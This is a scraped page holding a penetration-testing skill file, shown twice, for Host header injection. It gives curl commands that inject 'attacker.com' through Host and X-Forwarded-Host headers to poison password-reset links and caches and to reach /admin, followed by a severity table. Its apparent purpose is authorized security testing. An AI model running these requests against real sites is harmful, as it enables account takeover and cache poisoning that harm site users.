name	attack-host-header
description	Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host
category	web-application
version	1.0
author	cyberstrike-official
tags	["host-header","web","injection","attack"]
tech_stack	["web"]
cwe_ids	["CWE-644"]
chains_with	["attack-cache-poison","attack-open-redirect"]
prerequisites	[]
severity_boost	{"attack-cache-poison":"Host header + cache poisoning = stored attack affecting all users"}

Host Header Injection

Objective

Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.

Testing Methodology

Phase 1: Password Reset Poisoning

# Trigger password reset with injected Host
curl -X POST https://TARGET/forgot-password \
  -H "Host: attacker.com" \
  -d "email=victim@example.com"

# X-Forwarded-Host variant
curl -X POST https://TARGET/forgot-password \
  -H "X-Forwarded-Host: attacker.com" \
  -d "email=victim@example.com"

If the reset email link contains attacker.com, the token is leaked when victim clicks.

Phase 2: Duplicate Host Headers

# Two Host headers
curl https://TARGET/ \
  -H "Host: TARGET" \
  -H "Host: attacker.com"

# Host with port injection
curl https://TARGET/ \
  -H "Host: TARGET:@attacker.com"

Phase 3: X-Forwarded-Host / X-Host

curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
curl https://TARGET/ -H "X-Host: attacker.com"
curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"
curl https://TARGET/ -H "X-Original-URL: /admin"
curl https://TARGET/ -H "X-Rewrite-URL: /admin"

Phase 4: Absolute URL Routing

# Absolute URL overrides Host header
curl "https://TARGET/api" \
  -H "Host: internal-admin.TARGET"

Phase 5: Web Cache Poisoning via Host

# If response is cached with injected host
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com" -H "X-Cache: miss"
# Subsequent requests from any user will get poisoned response

What Constitutes a Finding

Finding	Severity
Password reset link contains injected host	Critical (P1)
Cache poisoned with injected host/links	High (P2)
Internal routing bypass (access /admin)	High (P2)
Host header reflected in page without sanitization	Medium (P3)

Evidence Requirements

Request with injected Host header
Response/email showing injected domain
For cache poisoning: cached response serving injected content
For password reset: full reset URL with attacker domain

References

同仓库更多 Skills

同仓库

attack-cache-poison

CyberStrikeus/CyberStrike

Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users

2026-06-01334

attack-cors

CyberStrikeus/CyberStrike

CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage

2026-06-01334

attack-graphql

CyberStrikeus/CyberStrike

GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass

2026-06-01334

attack-idor-automation

CyberStrikeus/CyberStrike

IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure

2026-06-01334

attack-jwt

CyberStrikeus/CyberStrike

JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping

2026-06-01334

attack-open-redirect

CyberStrikeus/CyberStrike

Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains

2026-06-01334

name	attack-host-header
description	Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host
category	web-application
version	1.0
author	cyberstrike-official
tags	["host-header","web","injection","attack"]
tech_stack	["web"]
cwe_ids	["CWE-644"]
chains_with	["attack-cache-poison","attack-open-redirect"]
prerequisites	[]
severity_boost	{"attack-cache-poison":"Host header + cache poisoning = stored attack affecting all users"}

Host Header Injection

Objective

Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.

Testing Methodology

Phase 1: Password Reset Poisoning

# Trigger password reset with injected Host
curl -X POST https://TARGET/forgot-password \
  -H "Host: attacker.com" \
  -d "email=victim@example.com"

# X-Forwarded-Host variant
curl -X POST https://TARGET/forgot-password \
  -H "X-Forwarded-Host: attacker.com" \
  -d "email=victim@example.com"

If the reset email link contains attacker.com, the token is leaked when victim clicks.

Phase 2: Duplicate Host Headers

# Two Host headers
curl https://TARGET/ \
  -H "Host: TARGET" \
  -H "Host: attacker.com"

# Host with port injection
curl https://TARGET/ \
  -H "Host: TARGET:@attacker.com"

Phase 3: X-Forwarded-Host / X-Host

curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
curl https://TARGET/ -H "X-Host: attacker.com"
curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"
curl https://TARGET/ -H "X-Original-URL: /admin"
curl https://TARGET/ -H "X-Rewrite-URL: /admin"

Phase 4: Absolute URL Routing

# Absolute URL overrides Host header
curl "https://TARGET/api" \
  -H "Host: internal-admin.TARGET"

Phase 5: Web Cache Poisoning via Host

# If response is cached with injected host
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com" -H "X-Cache: miss"
# Subsequent requests from any user will get poisoned response

What Constitutes a Finding

Finding	Severity
Password reset link contains injected host	Critical (P1)
Cache poisoned with injected host/links	High (P2)
Internal routing bypass (access /admin)	High (P2)
Host header reflected in page without sanitization	Medium (P3)

Evidence Requirements

Request with injected Host header
Response/email showing injected domain
For cache poisoning: cached response serving injected content
For password reset: full reset URL with attacker domain